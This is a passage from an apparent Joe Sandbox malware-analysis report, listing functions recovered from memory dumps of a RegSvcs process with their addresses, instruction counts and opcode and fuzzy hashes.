                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000C.00000002.59538034117.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_12_2_6510000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: ECq
                                                                                                                                                          • API String ID: 0-2706903857
                                                                                                                                                          • Opcode ID: 0cf523c395b5ecaba2970efc65f2fdfbcbfbc5f48e0da6c46623838361b206e5
                                                                                                                                                          • Instruction ID: 71284d58860146c2ee15ad8626212b9fb6f391e6205f1617db583075c5424b47
                                                                                                                                                          • Opcode Fuzzy Hash: 0cf523c395b5ecaba2970efc65f2fdfbcbfbc5f48e0da6c46623838361b206e5
                                                                                                                                                          • Instruction Fuzzy Hash: 3FA12174F10115CFD749EF64E9A8A6E77F2FB88300F1185A5E8499B398DE30AD428F85
                                                                                                                                                          Function 065169C8 Relevance: .3, Instructions: 309COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000C.00000002.59538034117.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_12_2_6510000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 77fe944d2bca4ea923d6c806ccb6fdb96160fba71f7b23cef205f6d6525b86d2
                                                                                                                                                          • Instruction ID: d51d53cbef1b2c6d8cdc01f9bcc33c49f83bef2717cb64503c8a01b235d28229
                                                                                                                                                          • Opcode Fuzzy Hash: 77fe944d2bca4ea923d6c806ccb6fdb96160fba71f7b23cef205f6d6525b86d2
                                                                                                                                                          • Instruction Fuzzy Hash: 75C16174F10204DFD745EFA4D954AAEB7F2FF89300B1085AAD84A9B354DA31AD02CF95
                                                                                                                                                          Function 0651268A Relevance: 1.4, Strings: 1, Instructions: 124COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000C.00000002.59538034117.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_12_2_6510000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: ECq
                                                                                                                                                          • API String ID: 0-2706903857
                                                                                                                                                          • Opcode ID: 0814ca563010c557eb9ed6c956fdf4e323693603675734fc4290907b273e7eeb
                                                                                                                                                          • Instruction ID: 8589982d0aa0bfb11b86d59ebd3f7c436b2b9e692a1f45772eed517a1b2c755d
                                                                                                                                                          • Opcode Fuzzy Hash: 0814ca563010c557eb9ed6c956fdf4e323693603675734fc4290907b273e7eeb
                                                                                                                                                          • Instruction Fuzzy Hash: 2C511D74F10215CFD745EF68E868AAA77F2FB88300F1045A5E4499B394DF34AD428F85
                                                                                                                                                          Function 06512697 Relevance: 1.4, Strings: 1, Instructions: 123COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000C.00000002.59538034117.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_12_2_6510000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: ECq
                                                                                                                                                          • API String ID: 0-2706903857
                                                                                                                                                          • Opcode ID: 0e7fe24311bd04e9806ab42a6b5f52ee05bd83d4257482fcc09361c660202517
                                                                                                                                                          • Instruction ID: 7f318604e0b36c3812b6360608c37d56864a14919df9f9975e0d3177c7543d6e
                                                                                                                                                          • Opcode Fuzzy Hash: 0e7fe24311bd04e9806ab42a6b5f52ee05bd83d4257482fcc09361c660202517
                                                                                                                                                          • Instruction Fuzzy Hash: 1D510D74F10215CFD755EF68E868AAA77F2FB88300F1045A5E4499B354DF34AD428F85
                                                                                                                                                          Function 028809CF Relevance: 1.4, Strings: 1, Instructions: 100COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000C.00000002.59499182811.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_12_2_2880000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: p0@
                                                                                                                                                          • API String ID: 0-36357665
                                                                                                                                                          • Opcode ID: 17923de8e51a2fc69e4d7316d82ef9387cfe79c2a2df16cf7d36d8eecb8764ca
                                                                                                                                                          • Instruction ID: 38e23ca09c93655a4f87c10d33b58891b6519d0ed3d3b48d8ae326e40969539f
                                                                                                                                                          • Opcode Fuzzy Hash: 17923de8e51a2fc69e4d7316d82ef9387cfe79c2a2df16cf7d36d8eecb8764ca
                                                                                                                                                          • Instruction Fuzzy Hash: E5411978B101048FCB48EF68D598AADBBF2BF8C710F2544A9E406EB361DA759C05CF51
                                                                                                                                                          Function 065128F0 Relevance: .5, Instructions: 481COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000C.00000002.59538034117.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_12_2_6510000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: daa0304742a20b6dc1f4e507d667f08a290ff25b2acbbb5f05f7c5aadd3178a2
                                                                                                                                                          • Instruction ID: e96951e2c4a3197ffb40c7b439537f47aa30e55ba8875fce02eefd2cf6fce12c
                                                                                                                                                          • Opcode Fuzzy Hash: daa0304742a20b6dc1f4e507d667f08a290ff25b2acbbb5f05f7c5aadd3178a2
                                                                                                                                                          • Instruction Fuzzy Hash: E7123B30A007068FEB65DF79C450A9EB7F2BF88714F248A29D4469B750DB74E982CF90
                                                                                                                                                          Function 065128E0 Relevance: .4, Instructions: 350COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000C.00000002.59538034117.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_12_2_6510000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 1b0f2fb5f3fbe4f665bdb104e78d1f67c408f8f964d4874a00c77237ecb443a6
                                                                                                                                                          • Instruction ID: a56937dacd0f75072205d89f13b45d6e1b3a2efaa6c373fccdd6cab5dbaf836c
                                                                                                                                                          • Opcode Fuzzy Hash: 1b0f2fb5f3fbe4f665bdb104e78d1f67c408f8f964d4874a00c77237ecb443a6
                                                                                                                                                          • Instruction Fuzzy Hash: FBD14D30A007069FE765DF79C850B9AB7F2FF84714F248A29D4469B690DB74E982CF90
                                                                                                                                                          Function 06513745 Relevance: .2, Instructions: 229COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000C.00000002.59538034117.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_12_2_6510000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 83d7cccd7af01dcd7410e2a31a31921ecd6a3fb9a963c5903e8ac1d4333c05c1
                                                                                                                                                          • Instruction ID: c228622dc2c6dd4e2dbf4748411b8ded6273e8fb719948c5c426bf1e4abe06de
                                                                                                                                                          • Opcode Fuzzy Hash: 83d7cccd7af01dcd7410e2a31a31921ecd6a3fb9a963c5903e8ac1d4333c05c1
                                                                                                                                                          • Instruction Fuzzy Hash: 7C91D834A00209DFDB54DFA9C594AADBBB2FF89314F2485A9D406AB361DB31ED42CF50
                                                                                                                                                          Function 06513C28 Relevance: .1, Instructions: 113COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000C.00000002.59538034117.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_12_2_6510000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: bcc90ec121c77ee38542d5031c0d5d36db4700a09e50de62a0c5d6a7ef58d8f6
                                                                                                                                                          • Instruction ID: b6e4abfc6d497e0754366937588abe652b01ceca28327be9c12682209f0243c6
                                                                                                                                                          • Opcode Fuzzy Hash: bcc90ec121c77ee38542d5031c0d5d36db4700a09e50de62a0c5d6a7ef58d8f6
                                                                                                                                                          • Instruction Fuzzy Hash: 2E41CE70B003499FDB15CF69C8A0AAABBF4FF89204B14896AE449CB711DB74ED05CBD0
                                                                                                                                                          Function 065138C2 Relevance: .1, Instructions: 98COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000C.00000002.59538034117.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_12_2_6510000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: e0a77ff0b3c839849f13755277578f27bd565aaec14531ccd756ef784bcca854
                                                                                                                                                          • Instruction ID: 6218d6501bca20664cb9480630b2f3d1aa19fe4d0c6374aaada92ae985e2aa40
                                                                                                                                                          • Opcode Fuzzy Hash: e0a77ff0b3c839849f13755277578f27bd565aaec14531ccd756ef784bcca854
                                                                                                                                                          • Instruction Fuzzy Hash: 68412B34A00608DFEB54DBA9C5A4BADBBB2BF88314F648568D405AF351DB35DD42CF50
                                                                                                                                                          Function 065133E0 Relevance: .1, Instructions: 93COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000C.00000002.59538034117.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_12_2_6510000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 9ef96d1ace8ed3e65ef504782d2fec6de71f1fc8b7566ae6d963e3bca36959d5
                                                                                                                                                          • Instruction ID: 0fa02ad062ebfcc39d609de549bb5a3c5e66df5508d2ae59a64150208ea210e6
                                                                                                                                                          • Opcode Fuzzy Hash: 9ef96d1ace8ed3e65ef504782d2fec6de71f1fc8b7566ae6d963e3bca36959d5
                                                                                                                                                          • Instruction Fuzzy Hash: DB31F9307003409FE325DF69D854A9A7BE5BFD5210B18CE5ED0C58F290DB31D806CB95
                                                                                                                                                          Function 06516D15 Relevance: .1, Instructions: 91COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000C.00000002.59538034117.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_12_2_6510000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 4d376b070ac1793be4d02e78849a30c492586b555c3fd71d79a71ade53ad6843
                                                                                                                                                          • Instruction ID: 5364df8851af216049493839239e088070cb171dc2c4cd41a1bb37746e09f771
                                                                                                                                                          • Opcode Fuzzy Hash: 4d376b070ac1793be4d02e78849a30c492586b555c3fd71d79a71ade53ad6843
                                                                                                                                                          • Instruction Fuzzy Hash: 52312431A05384AFD755CF69C980956BBF6FF89300B198AAED489CB702EA30E805CB51
                                                                                                                                                          Function 028808E0 Relevance: .1, Instructions: 84COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000C.00000002.59499182811.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_12_2_2880000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 1ed7b3502256c16acf10fba430d1da1ee9d7a25325a550931d8eb7120e9696fa
                                                                                                                                                          • Instruction ID: faa82bb5ec84323dfd77bf79cb9e05bc4a0c9100b6a03f99422879992ee08a5b
                                                                                                                                                          • Opcode Fuzzy Hash: 1ed7b3502256c16acf10fba430d1da1ee9d7a25325a550931d8eb7120e9696fa
                                                                                                                                                          • Instruction Fuzzy Hash: 1421D73870A3805FD707A739CC5075A3FB6AFC6510719849AE485CF263DA65DC098791
                                                                                                                                                          Function 06515CD0 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000C.00000002.59538034117.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_12_2_6510000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: e96a2dc78e493d392abc03c5e066cbd5a9753d91ee57335ed4a0ef1b0f95c14a
                                                                                                                                                          • Instruction ID: 710de08338e972658b10f900f0a5e3651757b855fcb0f63794a95ff0d60422ed
                                                                                                                                                          • Opcode Fuzzy Hash: e96a2dc78e493d392abc03c5e066cbd5a9753d91ee57335ed4a0ef1b0f95c14a
                                                                                                                                                          • Instruction Fuzzy Hash: 9F213470B053508FDB06AB2498297AE3FB2AF86300F54046AE441EF386DE381D06C7D2
                                                                                                                                                          Function 02880908 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000C.00000002.59499182811.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_12_2_2880000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: f94dbf5c13aeaf9aae28eb153ffffb6ddff8b79b32ee8f4fdae5f63705373e21
                                                                                                                                                          • Instruction ID: f09366b94e1531863ac277ab88acb92139222a8d3b3d1c793511d3a622a070fa
                                                                                                                                                          • Opcode Fuzzy Hash: f94dbf5c13aeaf9aae28eb153ffffb6ddff8b79b32ee8f4fdae5f63705373e21
                                                                                                                                                          • Instruction Fuzzy Hash: 7C11E0397002108FE714EB7ADC94B6E77EAEFC8A60B04842AE949CB350EF75DC048780
                                                                                                                                                          Function 06513C14 Relevance: .1, Instructions: 69COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000C.00000002.59538034117.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_12_2_6510000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: b046c885ae9c57c8be6375bdaf687e4d7aff1b3b7be35a5332b47cb5949a5747
                                                                                                                                                          • Instruction ID: 061b8902ce7fc16a7b4da9e451e0018b32800733c33894a2b7de18e650dc27d6
                                                                                                                                                          • Opcode Fuzzy Hash: b046c885ae9c57c8be6375bdaf687e4d7aff1b3b7be35a5332b47cb5949a5747
                                                                                                                                                          • Instruction Fuzzy Hash: A021E070A0034A9FCB01CF79C850AAABBF4FF49210B004A6AD499DB721D338E845CFA0
                                                                                                                                                          Function 065191D1 Relevance: .1, Instructions: 67COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000C.00000002.59538034117.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_12_2_6510000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 141eb89a8ee4c5589c59a07531b54e18d9e22e7ac36e12dff0156fbbae1388d8
                                                                                                                                                          • Instruction ID: 2d2b50a55f099859f014d143d45796381aa3d4cb6747922dad436cd1fc64988c
                                                                                                                                                          • Opcode Fuzzy Hash: 141eb89a8ee4c5589c59a07531b54e18d9e22e7ac36e12dff0156fbbae1388d8
                                                                                                                                                          • Instruction Fuzzy Hash: 4A2189748057889FDB21DFAAC854BCFBFF4EF49220F14884AC468A7291C3386945CFA1
                                                                                                                                                          Function 06513DF0 Relevance: .1, Instructions: 66COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000C.00000002.59538034117.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_12_2_6510000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 9e3e659f5d91865a8fc0d5ebc6006268ffe1375b031cca0ac37c10e09f5af1f9
                                                                                                                                                          • Instruction ID: 6b4c685a0d9044864cfb20bc9354db2eb69518451bcf8b54a3c789e04a3cb939
                                                                                                                                                          • Opcode Fuzzy Hash: 9e3e659f5d91865a8fc0d5ebc6006268ffe1375b031cca0ac37c10e09f5af1f9
                                                                                                                                                          • Instruction Fuzzy Hash: 7321F334600B028FE324DF19D554E52BBE5FB84324F55CA69E49A8BA61C770ED45CB80
                                                                                                                                                          Function 065187F0 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000C.00000002.59538034117.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_12_2_6510000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: e0a4b3ba9a827ab63f5b89e023b7504f1fe14f5501fd7eb2fd5e443a26f7ab6b
                                                                                                                                                          • Instruction ID: cbee9c8cbd6ab5bc75cda825689c90fab54ae806a2ceaa976f3b3684e93ae39b
                                                                                                                                                          • Opcode Fuzzy Hash: e0a4b3ba9a827ab63f5b89e023b7504f1fe14f5501fd7eb2fd5e443a26f7ab6b
                                                                                                                                                          • Instruction Fuzzy Hash: 6B110231E003109BE755EB69A81479E7BB2FBC4720F408A19E445AB384EF3058068BC6
                                                                                                                                                          Function 06513EC0 Relevance: .1, Instructions: 62COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000C.00000002.59538034117.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_12_2_6510000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 0eb7325f768beeb6f1322e255a42c130052dfc20ca61c22cad4fb24d7646c822
                                                                                                                                                          • Instruction ID: d9f6fc95eeb86f3071d8ecad2305b3441da350271df1c5b99b139adbc460e1bc
                                                                                                                                                          • Opcode Fuzzy Hash: 0eb7325f768beeb6f1322e255a42c130052dfc20ca61c22cad4fb24d7646c822
                                                                                                                                                          • Instruction Fuzzy Hash: CA118F747042409FE764CF29D898E53BBF9FF89614B1489A9E44ACB252D735EC06CB50
                                                                                                                                                          Function 06518800 Relevance: .1, Instructions: 58COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000C.00000002.59538034117.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_12_2_6510000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 9fef6fbd114a178bb2ab1b859716084650684b07c3257a689e8fbdf7a6fe0425
                                                                                                                                                          • Instruction ID: 577e4f829bf443a434f465c9f1db53b8c915e09d10e86c80fa193fa7e1b26a9a
                                                                                                                                                          • Opcode Fuzzy Hash: 9fef6fbd114a178bb2ab1b859716084650684b07c3257a689e8fbdf7a6fe0425
                                                                                                                                                          • Instruction Fuzzy Hash: 56119031F003149FE758EB69E8157AE7AB2FBC4710F408929E445AB384EF306D068BD6
                                                                                                                                                          Function 06512F57 Relevance: .1, Instructions: 55COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000C.00000002.59538034117.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_12_2_6510000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 0f9aa1a1b96345ec64d9a85165f589b198bcac8aaac9d27c60a592f97b47db82
                                                                                                                                                          • Instruction ID: c6b9bdaaf8d2ea7ff1759544ecc7f9beadceb6a58e5c3f93a2a1a464c0576942
                                                                                                                                                          • Opcode Fuzzy Hash: 0f9aa1a1b96345ec64d9a85165f589b198bcac8aaac9d27c60a592f97b47db82
                                                                                                                                                          • Instruction Fuzzy Hash: D61180357043019FD720CF69C8989A6BBF5FF8A251B18886EE59ADB752DA31EC01CB50
                                                                                                                                                          Function 06515D00 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000C.00000002.59538034117.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_12_2_6510000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 2ff721909b08a8db4c43e865a0c71094cd02a528f9e4661a9453d16738af986b
                                                                                                                                                          • Instruction ID: 3f7f11e6ad337c5d439dc1307de0429e6dab11ece604102002018a89984e2c8b
                                                                                                                                                          • Opcode Fuzzy Hash: 2ff721909b08a8db4c43e865a0c71094cd02a528f9e4661a9453d16738af986b
                                                                                                                                                          • Instruction Fuzzy Hash: BE01C030B102188BDB09AB68D86D7AE7BB2AFC8700F104529E801AF384CF785D028BD5
                                                                                                                                                          Function 06512F68 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000C.00000002.59538034117.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_12_2_6510000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 93b35c9687628369a1a998fdd0e12adaab55bcb1be5d698a20b8a12fee8094ee
                                                                                                                                                          • Instruction ID: 4f8e49f70c3ca9be91e62f582e7f858abe92a69f5fbf5c3cb243581dd0d8a093
                                                                                                                                                          • Opcode Fuzzy Hash: 93b35c9687628369a1a998fdd0e12adaab55bcb1be5d698a20b8a12fee8094ee
                                                                                                                                                          • Instruction Fuzzy Hash: 2E0162357002055FE710CF69D898966B7E5FF8D261B184869F589DF751DB32EC018B90
                                                                                                                                                          Function 0107D809 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000C.00000002.59498093818.000000000107D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0107D000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_12_2_107d000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 96ce45947a9f4efe64aeab188a40ae45faeba9024d5a362068f0ac0bf0e5bba0
                                                                                                                                                          • Instruction ID: 1ad570c3c4212dd6827f92ce7b61009cfdd9adb842cfaca63bddcebf3d9ab9ae
                                                                                                                                                          • Opcode Fuzzy Hash: 96ce45947a9f4efe64aeab188a40ae45faeba9024d5a362068f0ac0bf0e5bba0
                                                                                                                                                          • Instruction Fuzzy Hash: 8101D471904340AEE7905A9A8C84B66FFE8EF81670F18845AED8D0A286D3399440CBB5
                                                                                                                                                          Function 06519200 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000C.00000002.59538034117.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_12_2_6510000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 68d11744434272ae8cc2830dd19c09f1c7025988543b8bf54517ee027f727100
                                                                                                                                                          • Instruction ID: 66d3d870a7d7a3004fd2340e711367c86475d2b01276dc719154543dbf93d77a
                                                                                                                                                          • Opcode Fuzzy Hash: 68d11744434272ae8cc2830dd19c09f1c7025988543b8bf54517ee027f727100
                                                                                                                                                          • Instruction Fuzzy Hash: 7E1103B58003488FDB20DF9AC8847DEFBF5AB48210F248419C519A7240C378A944CFA1
                                                                                                                                                          Function 06518847 Relevance: .0, Instructions: 37COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000C.00000002.59538034117.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_12_2_6510000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: d9ab4fbda21e1df71f321c6a458119b70d5de20853c74aede604e678bab02a83
                                                                                                                                                          • Instruction ID: 7b0068ecdd7ffd6928a3a5bb43b27d0629dbb5a81449a5074a57a9df46bbf8bc
                                                                                                                                                          • Opcode Fuzzy Hash: d9ab4fbda21e1df71f321c6a458119b70d5de20853c74aede604e678bab02a83
                                                                                                                                                          • Instruction Fuzzy Hash: 5BF0C230B403104BE758BB68E850B9D77A3FBC4B20F404A18E5425F384DF746C4687C6
                                                                                                                                                          Function 0107D808 Relevance: .0, Instructions: 36COMMON
